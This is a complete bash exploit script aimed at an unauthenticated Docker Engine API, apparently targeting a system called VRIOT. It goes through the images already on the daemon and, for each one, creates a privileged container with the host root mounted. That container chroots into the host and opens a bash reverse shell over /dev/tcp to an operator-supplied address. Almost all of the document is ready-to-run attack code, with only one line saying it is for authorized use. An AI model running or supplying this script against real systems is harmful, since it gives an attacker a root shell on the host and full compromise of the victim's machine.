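#!/bin/bash
#
# vriot_shell.sh - get a host shell through an unauthenticated Docker Engine
# API (plain TCP, default port 2375).
#
# How it works: for each image already present on the daemon, create a
# container that is Privileged and bind-mounts the host root at /host, whose
# command chroots into /host and runs a bash reverse shell back to
# LHOST:LPORT. Every image needs `sh` inside it and the host needs /bin/bash;
# if either is missing the container exits immediately and the next image is
# tried.
#
# Usage:   ./vriot_shell.sh <LHOST> <LPORT>
# Env:     DOCKER_API  base URL of the daemon API (default http://localhost:2375)
# Exit:    0 when a container was created and is still running after start,
#          1 on bad arguments, unreachable API, or when every image failed.
#
# Operational notes for the operator:
#   - Needs curl and jq on the machine running this script.
#   - This is noisy: a privileged container with the host filesystem mounted
#     stays registered with the daemon until you remove it. The cleanup
#     command is printed on success; failed attempts are removed automatically.
#   - "Success" here only means the container is running ~1s after start;
#     confirm the callback on your listener.
#   - Only run against systems you are authorized to test.

set -u  # treat unset variables as bugs; -e is deliberately not used because
        # per-image failures are handled explicitly below

usage() {
  echo "Usage: $0 <LHOST> <LPORT>"
  echo "Example: $0 192.168.13.37 8080"
  exit 1
}

[ $# -eq 2 ] || usage

LHOST="$1"
LPORT="$2"
DOCKER_API="${DOCKER_API:-http://localhost:2375}"

# LHOST/LPORT end up inside a JSON body and inside a `sh -c` / `bash -c`
# command line. Restrict them so a stray quote, space or metacharacter in
# argv cannot break the JSON or the shell command.
if ! [[ "$LHOST" =~ ^[A-Za-z0-9.:-]+$ ]]; then
  echo "[!] LHOST must be a hostname or IP address (got: $LHOST)"
  exit 1
fi
if ! [[ "$LPORT" =~ ^[0-9]+$ ]] || (( LPORT < 1 || LPORT > 65535 )); then
  echo "[!] LPORT must be an integer in 1-65535 (got: $LPORT)"
  exit 1
fi

for tool in curl jq; do
  if ! command -v "$tool" >/dev/null 2>&1; then
    echo "[!] Required tool not found: $tool"
    exit 1
  fi
done

#######################################
# Perform one Docker API request.
# Arguments: $1 HTTP method, $2 API path, $3 optional JSON body
# Globals:   DOCKER_API (read); API_CODE, API_BODY (written)
# Returns:   0 if curl completed (any HTTP status), non-zero if it could not
#            talk to the daemon at all. Callers check API_CODE themselves.
#######################################
api() {
  local method="$1" path="$2" data="${3:-}"
  local out
  API_CODE=""
  API_BODY=""
  # The status code is appended on its own line so one request yields both
  # the body (for error details) and the HTTP status (for the success test).
  local args=(-s -S -X "$method" -w $'\n%{http_code}' "${DOCKER_API}${path}")
  if [ -n "$data" ]; then
    args+=(-H 'Content-Type: application/json' --data-binary "$data")
  fi
  out=$(curl "${args[@]}") || return 1
  API_CODE="${out##*$'\n'}"
  API_BODY="${out%$'\n'*}"
  return 0
}

# Print an API error body; fall back to raw text if it is not JSON
# (e.g. an HTML page from an intermediate proxy).
show_error_body() {
  if [ -n "$API_BODY" ]; then
    jq . <<<"$API_BODY" 2>/dev/null || printf '%s\n' "$API_BODY"
  fi
}

echo "[+] Target: ${LHOST}:${LPORT}"
echo "[+] Finding existing Docker images on VRIOT..."

if ! api GET /images/json || [ "$API_CODE" != "200" ]; then
  echo "[!] Could not list images from ${DOCKER_API} (HTTP ${API_CODE:-n/a})"
  show_error_body
  exit 1
fi
IMAGES="$API_BODY"

if ! jq -e 'type == "array"' <<<"$IMAGES" >/dev/null 2>&1; then
  echo "[!] Unexpected response from ${DOCKER_API}/images/json (not a JSON array)"
  exit 1
fi

# Prefer images that carry a real tag; Docker reports untagged images with a
# "<none>..." RepoTag (or no RepoTags at all). Fall back to every image ID.
IMAGE_IDS=$(jq -r '
  .[]
  | select(((.RepoTags // []) | map(select(startswith("<none>") | not)) | length) > 0)
  | .Id' <<<"$IMAGES")

if [ -z "$IMAGE_IDS" ]; then
  IMAGE_IDS=$(jq -r '.[].Id' <<<"$IMAGES")
fi

if [ -z "$IMAGE_IDS" ]; then
  echo "[!] No images found on system"
  exit 1
fi

# Inner command run by the host's bash after chroot. Kept as a plain string;
# jq's @sh quotes it below, so no hand-built shell quoting is needed.
PAYLOAD="bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1"

# shellcheck disable=SC2086 -- IMAGE_IDS is a newline-separated list of hex IDs
for IMAGE_ID in $IMAGE_IDS; do
  IMAGE_NAME=$(jq -r --arg id "$IMAGE_ID" \
    '.[] | select(.Id == $id) | ((.RepoTags // [])[0] // $id)' <<<"$IMAGES")
  echo "[+] Attempting with image: $IMAGE_NAME"

  # Build the create request with jq so every value is JSON-escaped, instead
  # of interpolating shell variables into a JSON string.
  BODY=$(jq -n --arg image "$IMAGE_ID" --arg payload "$PAYLOAD" '{
    Image: $image,
    Cmd: ["sh", "-c", ("chroot /host /bin/bash -c " + ($payload | @sh))],
    HostConfig: {
      Privileged: true,
      Binds: ["/:/host"]
    }
  }')

  if ! api POST /containers/create "$BODY" || [ "$API_CODE" != "201" ]; then
    echo "[!] Failed to create container with $IMAGE_NAME (HTTP ${API_CODE:-n/a})"
    show_error_body
    continue
  fi

  CONTAINER_ID=$(jq -r '.Id // empty' <<<"$API_BODY" 2>/dev/null)
  if [ -z "$CONTAINER_ID" ]; then
    echo "[!] Create succeeded but no container ID returned for $IMAGE_NAME"
    show_error_body
    continue
  fi
  echo "[+] Container created: $CONTAINER_ID"

  # Docker answers a successful start with 204 and an empty body.
  if ! api POST "/containers/${CONTAINER_ID}/start" || [ "$API_CODE" != "204" ]; then
    echo "[!] Start failed with $IMAGE_NAME (HTTP ${API_CODE:-n/a}):"
    show_error_body
    api DELETE "/containers/${CONTAINER_ID}?force=true" >/dev/null 2>&1
    continue
  fi

  # Give the chroot + callback a moment; a container whose command failed
  # (no sh in the image, no /bin/bash on the host, listener unreachable)
  # will already have exited by now.
  sleep 1
  if ! api GET "/containers/${CONTAINER_ID}/json"; then
    API_BODY='{}'
  fi
  STATE=$(jq -r '.State.Status // "unknown"' <<<"$API_BODY" 2>/dev/null)
  echo "[+] Container state: ${STATE:-unknown}"

  if [ "$STATE" = "running" ]; then
    echo "[+] Reverse shell triggered successfully!"
    echo "[+] Check your listener on ${LHOST}:${LPORT}"
    echo ""
    echo "[*] Container ID: $CONTAINER_ID"
    echo "    Cleanup: curl -X DELETE ${DOCKER_API}/containers/${CONTAINER_ID}?force=true"
    exit 0
  fi

  EXIT_CODE=$(jq -r '.State.ExitCode // "?"' <<<"$API_BODY" 2>/dev/null)
  echo "[!] Container did not stay up with $IMAGE_NAME (exit code ${EXIT_CODE:-?});"
  echo "    chroot or the callback to ${LHOST}:${LPORT} likely failed. Removing it."
  api DELETE "/containers/${CONTAINER_ID}?force=true" >/dev/null 2>&1
done

echo "[!] All images exhausted. No shell."
exit 1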
